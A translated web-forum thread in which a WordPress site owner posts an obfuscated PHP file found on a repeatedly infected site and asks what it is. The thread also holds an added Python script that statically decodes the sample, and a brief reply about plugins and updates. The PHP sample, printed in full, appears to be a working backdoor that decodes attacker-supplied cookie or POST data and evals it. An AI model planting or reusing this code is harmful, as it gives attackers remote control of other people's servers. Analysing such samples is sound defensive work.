Malware on WordPress!

Discussion in 'Website or mobile app development' started by sigma2008, 19 July 2016.

  1. sigma2008
    sigma2008 Involved WRInaute
    Joined:
    18 June 2008
    Posts:
    775
    Likes received:
    5
    Hello,
    I have a site hosted on a shared WordPress hosting plan. Each time (2 to 3 times a year) my site is infected, I find files that send mass emails in the FTP (more or less everywhere, in the modules, the WordPress files, etc.).
    Here is the type of code these malware files contain:

    Code:
    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['x71a2d93'] = "\x43\x9\x71\x40\x2c\x36\x2b\x7d\x27\x70\x73\x60\x45\x7b\x58\x2a\x5b\x21\x28\x33\x5f\x6d\x4b\x20\x34\x3b\x22\x26\x6a\x79\x59\x77\x4f\x44\x67\x35\x54\x25\x2e\x69\x39\x4e\xd\x32\x4c\x62\x3d\x63\x7e\x66\x65\x41\x57\x49\x24\x31\x50\x68\x3a\x7c\x7a\x46\x6c\x5e\x75\x2d\x48\x5d\x30\x78\x53\x56\x5a\x5c\x6e\x3c\x3f\x4d\x55\x72\x42\x37\x4a\x51\x76\x47\x23\x52\x2f\x29\x38\x6b\x61\x64\xa\x6f\x74\x3e";
    $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]] = $GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][79];
    $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]] = $GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][93];
    $GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][74];
    $GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96];
    $GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
    $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]] = $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74];
    $GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
    $GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50];
    $GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]] = $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][96];
    $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]] = $GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][90];
    $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][35];
    $GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] = $_POST;
    $GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] = $_COOKIE;
    @$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34], NULL);
    @$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][34].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][10], 0);
    @$GLOBALS[$GLOBALS['x71a2d93'][2].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47]]($GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][69].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][21].$GLOBALS['x71a2d93'][50], 0);
    @$GLOBALS[$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][24]](0);
    
    $hadb04790 = NULL;
    $j1b154b2 = NULL;
    
    $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][90]] = $GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][24];
    global $sa68;
    
    function ucda1dd65($hadb04790, $r4e7)
    {
        $u9b4c = "";
    
        for ($vd66f6=0; $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790);)
        {
            for ($da2388=0; $da2388<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($r4e7) && $vd66f6<$GLOBALS[$GLOBALS['x71a2d93'][96].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][90].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][47]]($hadb04790); $da2388++, $vd66f6++)
            {
                $u9b4c .= $GLOBALS[$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][40]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($hadb04790[$vd66f6]) ^ $GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][19]]($r4e7[$da2388]));
            }
        }
    
        return $u9b4c;
    }
    
    function q1bd628($hadb04790, $r4e7)
    {
        global $sa68;
    
        return $GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][19].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][90]]($hadb04790, $sa68), $r4e7);
    }
    
    foreach ($GLOBALS[$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][92]] as $r4e7=>$ccfa5)
    {
        $hadb04790 = $ccfa5;
        $j1b154b2 = $r4e7;
    }
    
    if (!$hadb04790)
    {
        foreach ($GLOBALS[$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][40].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][35].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][24]] as $r4e7=>$ccfa5)
        {
            $hadb04790 = $ccfa5;
            $j1b154b2 = $r4e7;
        }
    }
    
    $hadb04790 = @$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]]($GLOBALS[$GLOBALS['x71a2d93'][57].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81]]($GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]]($hadb04790), $j1b154b2));
    if (isset($hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]]) && $sa68==$hadb04790[$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][91]])
    {
        if ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][39])
        {
            $vd66f6 = Array(
                $GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][84] => @$GLOBALS[$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][43]](),
                $GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][84] => $GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][38].$GLOBALS['x71a2d93'][68].$GLOBALS['x71a2d93'][65].$GLOBALS['x71a2d93'][55],
            );
            echo @$GLOBALS[$GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][43]]($vd66f6);
        }
        elseif ($hadb04790[$GLOBALS['x71a2d93'][92]] == $GLOBALS['x71a2d93'][50])
        {
            eval($hadb04790[$GLOBALS['x71a2d93'][93]]);
        }
        exit();
    }
    
    Do you have any idea what type of malware this is and where it comes from?
    Thanks
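
Added example, not part of the original post: a static pass in Python that decodes the sample's `x71a2d93` lookup table and rewrites each `$GLOBALS['x71a2d93'][N]` chain as a plain string, so the aliased PHP functions and the final `eval` on request-supplied data can be read without running the file. The helper names (`php_unescape`, `resolve`, `aliases`, `review`) and the watchlist are assumptions of this example; the table and the three statements are copied from the sample above.

```python
import re

# Lookup table literal copied from the first statement of the sample posted above.
TABLE_LITERAL = r"\x43\x9\x71\x40\x2c\x36\x2b\x7d\x27\x70\x73\x60\x45\x7b\x58\x2a\x5b\x21\x28\x33\x5f\x6d\x4b\x20\x34\x3b\x22\x26\x6a\x79\x59\x77\x4f\x44\x67\x35\x54\x25\x2e\x69\x39\x4e\xd\x32\x4c\x62\x3d\x63\x7e\x66\x65\x41\x57\x49\x24\x31\x50\x68\x3a\x7c\x7a\x46\x6c\x5e\x75\x2d\x48\x5d\x30\x78\x53\x56\x5a\x5c\x6e\x3c\x3f\x4d\x55\x72\x42\x37\x4a\x51\x76\x47\x23\x52\x2f\x29\x38\x6b\x61\x64\xa\x6f\x74\x3e"
# Three statements copied from the same sample: two alias definitions and the final call.
SAMPLE = r"""
$GLOBALS[$GLOBALS['x71a2d93'][9].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][43].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][81].$GLOBALS['x71a2d93'][68]] = $GLOBALS['x71a2d93'][64].$GLOBALS['x71a2d93'][74].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][79].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][62].$GLOBALS['x71a2d93'][39].$GLOBALS['x71a2d93'][60].$GLOBALS['x71a2d93'][50];
$GLOBALS[$GLOBALS['x71a2d93'][91].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][49].$GLOBALS['x71a2d93'][55].$GLOBALS['x71a2d93'][47]] = $GLOBALS['x71a2d93'][45].$GLOBALS['x71a2d93'][92].$GLOBALS['x71a2d93'][10].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][5].$GLOBALS['x71a2d93'][24].$GLOBALS['x71a2d93'][20].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50].$GLOBALS['x71a2d93'][47].$GLOBALS['x71a2d93'][95].$GLOBALS['x71a2d93'][93].$GLOBALS['x71a2d93'][50];
eval($hadb04790[$GLOBALS['x71a2d93'][93]]);
"""

REF = r"\$GLOBALS\['x71a2d93'\]\[(\d+)\]"          # one table lookup
CHAIN = re.compile(REF + r"(?:\s*\.\s*" + REF + r")*")  # lookups joined with "."
# Functions worth flagging when they hide behind an alias (assumed watchlist).
WATCHLIST = {"base64_decode", "unserialize", "gzinflate", "str_rot13", "assert", "create_function"}

def php_unescape(literal):
    """Decode PHP double-quoted \\xH / \\xHH escapes; PHP accepts one or two hex digits."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), literal)

def resolve(src, table):
    """Rewrite every chain of table lookups as the quoted string it builds."""
    def repl(m):
        idx = [int(i) for i in re.findall(REF, m.group(0))]
        if any(i >= len(table) for i in idx):
            return m.group(0)  # index outside the table: leave the chain untouched
        return repr("".join(table[i] for i in idx))
    return CHAIN.sub(repl, src)

def aliases(resolved):
    """Map each $GLOBALS['alias'] = 'function'; assignment found in resolved code."""
    return dict(re.findall(r"\$GLOBALS\['(\w+)'\]\s*=\s*'(\w+)';", resolved))

def review(src, table):
    """Return the watchlisted functions reached through aliases, plus a direct eval."""
    resolved = resolve(src, table)
    hits = {fn for fn in aliases(resolved).values() if fn in WATCHLIST}
    if re.search(r"\beval\s*\(", resolved):
        hits.add("eval")
    return sorted(hits)

if __name__ == "__main__":
    table = php_unescape(TABLE_LITERAL)
    print(resolve(SAMPLE, table))
    print(review(SAMPLE, table))
```

Run against a copy of a suspect file rather than the sample excerpt, the same pass turns the whole listing into readable PHP; the file itself is never executed.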
     
  2. Madrileño
    Madrileño Honored Member
    Joined:
    7 July 2004
    Posts:
    32 079
    Likes received:
    283
    Hello,

    The site (URL) would need to be checked; usually it's a plugin problem.
    Otherwise, keeping WordPress up to date, along with the modules, is usually sufficient.
    You can also check the other sites you host in the same space.

    Between two posts, don't hesitate to also give your opinions on the forum topics:
    https://www.webrankinfo.com/forum/f/demandes-davis-et-de-conseils-sur-vos-sites.36/
    to help the other people in the mutual-help community.

    Regards.
     
  3. UsagiYojimbo
    UsagiYojimbo Addicted WRInaute
    Joined:
    23 November 2005
    Posts:
    11 925
    Likes received:
    77